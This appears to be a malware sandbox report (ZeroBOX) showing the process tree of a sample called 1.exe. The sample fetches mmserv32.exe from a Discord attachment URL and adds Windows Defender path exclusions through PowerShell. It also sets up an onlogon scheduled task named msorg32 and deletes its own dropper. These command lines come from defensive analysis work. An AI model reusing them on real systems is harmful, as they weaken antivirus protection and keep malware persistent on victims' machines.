| ZeroBOX

1.exe "C:\Users\test22\AppData\Local\Temp\1.exe"
2096
- cmd.exe "C:\Windows\system32\cmd" /c "C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\7B16.bat C:\Users\test22\AppData\Local\Temp\1.exe"
  1636
  - extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    1080
  - extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
    1376
  - extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe" "mmserv32.exe" "" "" "" "" "" ""
    1168
  - mmserv32.exe mmserv32.exe
    456
    - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2452
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        2712
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2440
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
        1788
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        2928
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe"
      248
      - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe"
        1328
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit
        240
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"'
        888
        
        msorg32.exe "C:\Windows\system32\msorg32.exe"
        2596
        
        cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        1956
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        2512
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2060
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe"
        2396
        
        svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe"
        1088
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit
        1428
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"'
        2500
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
        2392
        
        choice.exe choice /C Y /N /D Y /T 3
        2300
  - extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
    2404

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents